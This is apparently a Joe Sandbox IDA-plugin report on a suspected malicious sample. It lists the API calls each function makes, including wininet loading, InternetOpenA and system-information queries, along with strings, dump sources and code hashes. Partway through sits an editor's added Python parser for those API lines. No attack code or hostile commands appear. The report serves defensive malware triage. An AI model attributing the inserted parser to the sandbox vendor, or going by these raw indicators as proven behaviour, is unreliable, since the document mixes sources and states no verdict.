• Opcode Fuzzy Hash: 419b73d1114cafdf75a183c171001977a78087d38d1c1d05a48007f4e2ee6705
• Instruction Fuzzy Hash: A622D1305183818FD72ADF24C855FABB7E1BF85305F104A1CF8895B6A2DB749689CB82
Uniqueness

Uniqueness Score: -1.00%

APIs
• SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 0035D9D3
Similarity
• API ID: FolderPath
• String ID:
• API String ID: 1514166925-0
• Opcode ID: cc34e60892831da60e073398214a90cc232b70765189d7437be36bc63dae1f5c
• Instruction ID: a30c4d7611020a519c870c4763ebbf64345f9d8010c608cdee6dc54762a667b1
• Opcode Fuzzy Hash: cc34e60892831da60e073398214a90cc232b70765189d7437be36bc63dae1f5c
• Instruction Fuzzy Hash: F712F3305183808FD72ADF24C895FAEB7E1BF95305F144A4CF8855B6B2DB749689CB82
Uniqueness

Uniqueness Score: -1.00%

APIs
• NtQuerySystemInformation.NTDLL(?,?,?,?,?,?), ref: 0036BF78
Similarity
• API ID: InformationQuerySystem
• String ID:
• API String ID: 3562636166-0
• Opcode ID: 12fa1801f7db296e48f1fcbd30c9a1bf67f08a1a76780d55145160ed036e575c
• Instruction ID: 819228433ca34e07801af3400406decfa3c380285e9dd1d46407fa4f9baedcfe
• Opcode Fuzzy Hash: 12fa1801f7db296e48f1fcbd30c9a1bf67f08a1a76780d55145160ed036e575c
• Instruction Fuzzy Hash: 50411730F003448BDB0AAFB4CC46BAEB7B5EF41304F608619F4059F2A6DB75A9C58B91
Uniqueness

Uniqueness Score: -1.00%

APIs
• NtQuerySystemInformation.NTDLL(?,?,?,?,?,?), ref: 0036BDF8
Similarity
• API ID: InformationQuerySystem
• String ID:
• API String ID: 3562636166-0
• Opcode ID: 54263fb0e8418457b89b24ab5d248f00b93821a4dd0bda96c6aee0af78bc91fe
• Instruction ID: 51ae97fe40d8338fef5e5c18f1a8135abaf37d39f5ed5bc244042da8ebc2cd60
• Opcode Fuzzy Hash: 54263fb0e8418457b89b24ab5d248f00b93821a4dd0bda96c6aee0af78bc91fe
• Instruction Fuzzy Hash: F9412930E002049BDB0AAF70DC45BAEB7B5EF45304F50864DF901AF2D2DBB5A9848BA1
Uniqueness

Uniqueness Score: -1.00%

Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5a5eb47d894c4dc21f9510ac2c5b7ecc00d4592f5d8df4316975112a2377079b
• Instruction ID: d10bc94119bbb9d08299417e9676bf2be8960b213dfe0cc0747b33e3bdb18779
• Opcode Fuzzy Hash: 5a5eb47d894c4dc21f9510ac2c5b7ecc00d4592f5d8df4316975112a2377079b
• Instruction Fuzzy Hash: 29F1AEB1A01B048FDB25CF29C850BAAB7F5FF48315F14066DD9AA97760E770B948CB50
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• ___std_exception_destroy.LIBVCRUNTIME ref: 003607C9
• ___std_exception_destroy.LIBVCRUNTIME ref: 003607DE
• ___std_exception_destroy.LIBVCRUNTIME ref: 00360A17
• ___std_exception_destroy.LIBVCRUNTIME ref: 00360A32
Strings
Similarity
• API ID: ___std_exception_destroy
• String ID: Te9$Te9$Te9$Te9$value
• API String ID: 4194217158-3765628305
• Opcode ID: 5831184942f191d3132d9b05f1719b2d04a2124b38ab72436e745df4424e6d30
• Instruction ID: 53df12632cbc5962fd5bb12a81826ca80cc0718b5181505b18188f408e7bec85
• Opcode Fuzzy Hash: 5831184942f191d3132d9b05f1719b2d04a2124b38ab72436e745df4424e6d30
• Instruction Fuzzy Hash: F202E3715183808FD32ADB24C895BAFBBE5BFC5304F048A1DF48997395D774A984CB92
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
  • Part of subcall function 00374780: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,?,?,?,00000000,811C9DC5,00000000), ref: 00374832
• GetModuleHandleW.KERNEL32(kernel32.dll,00000000,4DDDE966,00000000,E23B96E7,00000000,960CB4C6,?,00000000,?,?,0035D592,?,00000009), ref: 00356507
• GetModuleHandleW.KERNEL32(Wininet.dll,?,00000000,?,?,0035D592,?,00000009), ref: 00356514
• FreeLibrary.KERNEL32(00000000,?,00000000,?,?,0035D592,?,00000009), ref: 0035651D
• FreeLibrary.KERNEL32(00000000,?,00000000,?,?,0035D592,?,00000009), ref: 00356524
• InternetOpenA.WININET(?,00000000,?,?,0035D592,?,00000009), ref: 00356548
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: FreeHandleLibraryModule$ByteCharInternetMultiOpenWide
                                                                                                                                                                                            • String ID: Kernel32.dll$Wininet.dll$Wininet.dll$kernel32.dll
                                                                                                                                                                                            • API String ID: 17917458-2727469521
                                                                                                                                                                                            • Opcode ID: 85353d1a34a9b932a1228865b1727c0bac12c451b0290e9c134dc85bb27a57f9
                                                                                                                                                                                            • Instruction ID: 582da0b8b8d2ccb02e4683e2ba918d13ccd24f779587008e1658040bfcb09523
                                                                                                                                                                                            • Opcode Fuzzy Hash: 85353d1a34a9b932a1228865b1727c0bac12c451b0290e9c134dc85bb27a57f9
                                                                                                                                                                                            • Instruction Fuzzy Hash: E411A531A01210ABDB267F799C8AF5B7A9CEF0A751F004067F505EF256D779EC008BA8
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

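The API bullet lines in these function listings follow one fixed shape: an optional "Part of subcall function <addr>:" prefix when the call is surfaced from a callee, then <api>.<module>, an optional argument list as the sandbox rendered it (DWORDs, "?" for unknown values, or literal strings such as kernel32.dll), and the call site after "ref:". When triaging many such reports it is worth pulling these into structured records, for instance to see which libraries a function resolves at run time (here GetModuleHandleW on kernel32.dll and Wininet.dll ahead of InternetOpenA). The parser below is an added example written for this edit; it is not part of the Joe Sandbox report or its tooling. The sample text is constructed by copying lines from this page's listings, and the set of loader APIs checked by resolved_libraries is the example's own assumption.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample input: API lines copied from the function listings in this
# report (bullets, argument lists and "ref:" call sites exactly as rendered).
SAMPLE = """\
  • Part of subcall function 00374780: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,?,?,?,00000000,811C9DC5,00000000), ref: 00374832
• GetModuleHandleW.KERNEL32(kernel32.dll,00000000,4DDDE966,00000000,E23B96E7,00000000,960CB4C6,?,00000000,?,?,0035D592,?,00000009), ref: 00356507
• GetModuleHandleW.KERNEL32(Wininet.dll,?,00000000,?,?,0035D592,?,00000009), ref: 00356514
• FreeLibrary.KERNEL32(00000000,?,00000000,?,?,0035D592,?,00000009), ref: 0035651D
• FreeLibrary.KERNEL32(00000000,?,00000000,?,?,0035D592,?,00000009), ref: 00356524
• InternetOpenA.WININET(?,00000000,?,?,0035D592,?,00000009), ref: 00356548
• __allrem.LIBCMT ref: 0037A4A2
• GetTimeZoneInformation.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00387E75,00000000,00000000,00000000), ref: 00387D34
Strings
"""

# One line: optional "Part of subcall function <addr>:" prefix, then
# <api>.<module>, an optional "(args)" list, and the "ref: <addr>" call site.
LINE_RE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<subcall>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[^.(\s]+)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r"\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
HEX_DWORD_RE = re.compile(r"^[0-9A-Fa-f]{8}$")

# Loader APIs whose first argument names the library being resolved.
# This list is an assumption of the example; extend it as needed.
LOADER_APIS = {"GetModuleHandleA", "GetModuleHandleW",
               "LoadLibraryA", "LoadLibraryW", "LoadLibraryExA", "LoadLibraryExW"}


@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: Tuple[str, ...]
    ref: int                  # address of the call site
    subcall: Optional[int]    # callee address when reported via "Part of subcall function"


def parse_api_lines(text: str) -> List[ApiCall]:
    """Parse the report's API bullet lines; lines that are not calls (headings etc.) are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = tuple(a.strip() for a in raw.split(",")) if raw else ()
        sub = m.group("subcall")
        calls.append(ApiCall(
            api=m.group("api"),
            module=m.group("module"),
            args=args,
            ref=int(m.group("ref"), 16),
            subcall=int(sub, 16) if sub else None,
        ))
    return calls


def direct_calls(calls: List[ApiCall]) -> List[ApiCall]:
    """Calls made by the listed function itself, not surfaced from a callee."""
    return [c for c in calls if c.subcall is None]


def is_literal_string(arg: str) -> bool:
    """True when the sandbox rendered the argument as a string rather than a DWORD or '?'."""
    return arg != "?" and HEX_DWORD_RE.match(arg) is None


def resolved_libraries(calls: List[ApiCall]) -> List[str]:
    """Library names passed to loader APIs, i.e. modules the code resolves at run time."""
    return [c.args[0] for c in calls
            if c.api in LOADER_APIS and c.args and is_literal_string(c.args[0])]


def modules_touched(calls: List[ApiCall]) -> List[str]:
    """Distinct modules (as the report labels them) that the listed calls land in."""
    return sorted({c.module for c in calls})


if __name__ == "__main__":
    parsed = parse_api_lines(SAMPLE)
    for c in parsed:
        print(f"{c.ref:08X} {c.api}.{c.module} args={len(c.args)} subcall={c.subcall}")
    print("resolved at run time:", resolved_libraries(parsed))
    print("modules:", modules_touched(parsed))
```

The subcall distinction matters when reading these listings: a call attributed to "Part of subcall function" belongs to a helper the function invokes, so counting it against the listed function inflates its apparent behaviour. Arguments the sandbox could not recover are rendered as "?", so a literal string in a loader call's first argument is the reliable signal for a run-time library resolution, not the presence of the call alone.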
                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Control-flow graph of the function at 0037A31A (basic blocks 0037A31A to 0037A5AA): rendered graph not reproduced here.
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • __allrem.LIBCMT ref: 0037A4A2
                                                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0037A4BE
                                                                                                                                                                                            • __allrem.LIBCMT ref: 0037A4D5
                                                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0037A4F3
                                                                                                                                                                                            • __allrem.LIBCMT ref: 0037A50A
                                                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0037A528
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1992179935-0
                                                                                                                                                                                            • Opcode ID: 4cc5fcb63fc0fb0f33292742b2270eaeef427511029ac7991fc2c2c9b2d6257d
                                                                                                                                                                                            • Instruction ID: 72091e931c85f66f88fccaa7d1ab9b0fd26713001a5ba228d14719d4dec14559
                                                                                                                                                                                            • Opcode Fuzzy Hash: 4cc5fcb63fc0fb0f33292742b2270eaeef427511029ac7991fc2c2c9b2d6257d
                                                                                                                                                                                            • Instruction Fuzzy Hash: D581F871604B02DBE733AF69CC41B5E73E9AF85324F24C629F459DB681E778D9008751
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Control-flow graph of the function at 00387CC2 (basic blocks 00387CC2 to 00387E91): rendered graph not reproduced here.
                                                                                                                                                                                            APIs
                                                                                                                                                                                              • Part of subcall function 0038524E: RtlFreeHeap.NTDLL(00000000,00000000,?,0038BB96,?,00000000,?,?,0038BE37,?,00000007,?,?,0038C3EC,?,?), ref: 00385264
                                                                                                                                                                                              • Part of subcall function 0038524E: GetLastError.KERNEL32(?,?,0038BB96,?,00000000,?,?,0038BE37,?,00000007,?,?,0038C3EC,?,?), ref: 0038526F
                                                                                                                                                                                            • GetTimeZoneInformation.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00387E75,00000000,00000000,00000000), ref: 00387D34
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                            • String ID: W. Europe Standard Time$W. Europe Summer Time$}~8
                                                                                                                                                                                            • API String ID: 3335090040-2327886507
                                                                                                                                                                                            • Opcode ID: 6a557f10be7362b8bbd3970f149e5ea05464f6cffa9789334b82ccd3554346c2
                                                                                                                                                                                            • Instruction ID: a01c5e9d869472776763b0773e71deb18dad4b019bd0ca93f45a84ccfe4e1c96
                                                                                                                                                                                            • Opcode Fuzzy Hash: 6a557f10be7362b8bbd3970f149e5ea05464f6cffa9789334b82ccd3554346c2
                                                                                                                                                                                            • Instruction Fuzzy Hash: 1441D472904315ABCB27BF64DC4699EBB79EF02760B2141E6F814AB1A1EB70DD009B90
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Control-flow graph of the function at 0035EE10 (basic blocks 0035EE10 to 0035EF0A): rendered graph not reproduced here.
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 0035EF00
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                            • String ID: 0p5
                                                                                                                                                                                            • API String ID: 118556049-2728821079
                                                                                                                                                                                            • Opcode ID: eaf6eeafe5163bc3c602f97f1789f767a2ed07e258834797a9e9b48ec5ef307e
                                                                                                                                                                                            • Instruction ID: dd9fe2fcc320885abdaaecc1d69aaeaf3aa33191c5509151d6e57c5e4145135e
                                                                                                                                                                                            • Opcode Fuzzy Hash: eaf6eeafe5163bc3c602f97f1789f767a2ed07e258834797a9e9b48ec5ef307e
                                                                                                                                                                                            • Instruction Fuzzy Hash: CC213C72A113049BD73A9F74D842A6AB2E8DF04312F11073EF816CB291DB319A484791
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 0035FF67
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 118556049-0
                                                                                                                                                                                            • Opcode ID: 9b54faf3cc7a002fe1f4cf2e8cc186d829ff38ed1ff45ce8044a41b02ec7de7f
                                                                                                                                                                                            • Instruction ID: 93c36b2c54c31f9fba21d1abd367b83a565f405af744e7ea7eb4c27c73174252
                                                                                                                                                                                            • Opcode Fuzzy Hash: 9b54faf3cc7a002fe1f4cf2e8cc186d829ff38ed1ff45ce8044a41b02ec7de7f
                                                                                                                                                                                            • Instruction Fuzzy Hash: 3B715472A001159FCB2AEF78CC82A6FB3A8EF85351B1542B9EC15EB351DB30ED158791
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

APIs
• RtlFreeHeap.NTDLL(00000000,00000000,?,0038BB96,?,00000000,?,?,0038BE37,?,00000007,?,?,0038C3EC,?,?), ref: 00385264
• GetLastError.KERNEL32(?,?,0038BB96,?,00000000,?,?,0038BE37,?,00000007,?,?,0038C3EC,?,?), ref: 0038526F
Memory Dump Source
• Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
• Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
Similarity
• API ID: ErrorFreeHeapLast
• String ID:
• API String ID: 485612231-0
• Opcode ID: 8b246e8d89a21940a667ec47a1a308f5d03b1ceced65f3e8aa0493cf6eb6b359
• Instruction ID: f80a5b10bac0c799db1d0fdd801f261892076ea375c3ba4b744e07e05cdf918a
• Opcode Fuzzy Hash: 8b246e8d89a21940a667ec47a1a308f5d03b1ceced65f3e8aa0493cf6eb6b359
• Instruction Fuzzy Hash: 37E08C32504B04AFCB332FA0AC0AB997B6CAB00391F414061F60C8A160DB399850C794
Uniqueness

Uniqueness Score: -1.00%

APIs
• Concurrency::cancel_current_task.LIBCPMT ref: 003600D3
Memory Dump Source
• Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
• Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
Similarity
• API ID: Concurrency::cancel_current_task
• String ID:
• API String ID: 118556049-0
• Opcode ID: bb896479fcb77cb24a1ade57c71640002f81142846f9b7e9dea8cb5cf785a998
• Instruction ID: 955728d08cb6fb7eafae87c22b4003c600125f5eed2c5e4b2faee5a5d6d2c822
• Opcode Fuzzy Hash: bb896479fcb77cb24a1ade57c71640002f81142846f9b7e9dea8cb5cf785a998
• Instruction Fuzzy Hash: 3731F572A001199FCF1ADF68CC82AAFB7B4FF44300B1045A9E815EB345D770EE558B91
Uniqueness

Uniqueness Score: -1.00%

APIs
• ___std_exception_copy.LIBVCRUNTIME ref: 00355FFE
  • Part of subcall function 0037650E: RaiseException.KERNEL32(E06D7363,00000001,00000003,00355FDC,?,?,?,?,00355FDC,?,003A5A7C), ref: 0037656E
Memory Dump Source
• Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
• Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
Similarity
• API ID: ExceptionRaise___std_exception_copy
• String ID:
• API String ID: 3109751735-0
• Opcode ID: c9cd6ad3afdcba1510ee1c7de334b0ee972e6d6baccea915118f40ca9ead844e
• Instruction ID: d2f409187343bd8964eb5df2b762b66b9fa5d7f1c000b0de178379071a5c1a3b
• Opcode Fuzzy Hash: c9cd6ad3afdcba1510ee1c7de334b0ee972e6d6baccea915118f40ca9ead844e
• Instruction Fuzzy Hash: 79012635800B0D7BCB26BAA8EC12D89B36CDE06320B50C521FA18EA491FBB4F95487D1
Uniqueness

Uniqueness Score: -1.00%

APIs
• RtlAllocateHeap.NTDLL(00000008,?,?,?,00386317,00000001,00000364,?,00000006,000000FF,?,?,0037B141,0038669F), ref: 00385232
Memory Dump Source
• Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
• Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: 6f11d5e1fed936a5cae91e1930be5abcca60f14b47330e4a42eabf84e69953f1
• Instruction ID: 581b40e61fe79aa031d3650cfeef3cf1ea1c6f98c9603af3eb154d2d84ee4c31
• Opcode Fuzzy Hash: 6f11d5e1fed936a5cae91e1930be5abcca60f14b47330e4a42eabf84e69953f1
• Instruction Fuzzy Hash: FDF0E932615B246ADB237B369C06B9B775DAF91760F1648D1BC14DA190CF30D90087E0
Uniqueness

Uniqueness Score: -1.00%

APIs
• RtlAllocateHeap.NTDLL(00000000,?,?,?,003513C8,00000000,?), ref: 0038668E
Memory Dump Source
• Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
• Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: 4891e37b7206c84f5b91ceb0085094caab916664003b50908c8dabdc4a2f238d
• Instruction ID: 21b22c2a75f031958dcaa4783396e35c81541d076fd82b8d3e5657f26ff96cb1
• Opcode Fuzzy Hash: 4891e37b7206c84f5b91ceb0085094caab916664003b50908c8dabdc4a2f238d
• Instruction Fuzzy Hash: 56E02B311043905AD73337759C03B5BB68C9F413B4F1701A1BC0996280FF10DC0087E5
Uniqueness

Uniqueness Score: -1.00%

APIs
• Concurrency::cancel_current_task.LIBCPMT ref: 0036453A
Strings
Memory Dump Source
• Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
• Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
Similarity
• API ID: Concurrency::cancel_current_task
• String ID: Te9$array$object$object key$object separator$parse error$parse_error
• API String ID: 118556049-1052598150
• Opcode ID: b9aab26418535dbf1506ba19a845285e16523048d261b6b5f795375f767741b6
• Instruction ID: 82614b94480177b2f767f7bc92eb424754008d9a7f1ca55e0deb55c49914f193
• Opcode Fuzzy Hash: b9aab26418535dbf1506ba19a845285e16523048d261b6b5f795375f767741b6
• Instruction Fuzzy Hash: 9142D970D102099FDB1ADFA4CC95BEDBBB5EF15300F14866DE406EB246EB749A84CB90
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
• Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
Similarity
• API ID:
• String ID: N'9$N'9
• API String ID: 0-4015299821
• Opcode ID: 7c5a4e439db4260b8ba97fc2a09b4b01db6ba13208e6a6a6efe7f77be1289794
• Instruction ID: 751d774ffd85f188cfd791b4530143c4ab75dac8635fa40afbac7a1d388ff0aa
• Opcode Fuzzy Hash: 7c5a4e439db4260b8ba97fc2a09b4b01db6ba13208e6a6a6efe7f77be1289794
• Instruction Fuzzy Hash: 9E024E75E002199BDF25CFA9C880AAEFBF5FF48314F1582A9E519EB341D735A901CB90
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
• Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
Similarity
• API ID: __floor_pentium4
• String ID: 1#IND$1#INF$1#QNAN$1#SNAN
• API String ID: 4168288129-2761157908
• Opcode ID: d06f69d364ee34a3c2d1e248609cd19968a3a4677afc982ffd880462abdef489
• Instruction ID: 2d4a7e44c664b92a6cf90f0084441309e21b17233e6551464aa034ac94d62acd
• Opcode Fuzzy Hash: d06f69d364ee34a3c2d1e248609cd19968a3a4677afc982ffd880462abdef489
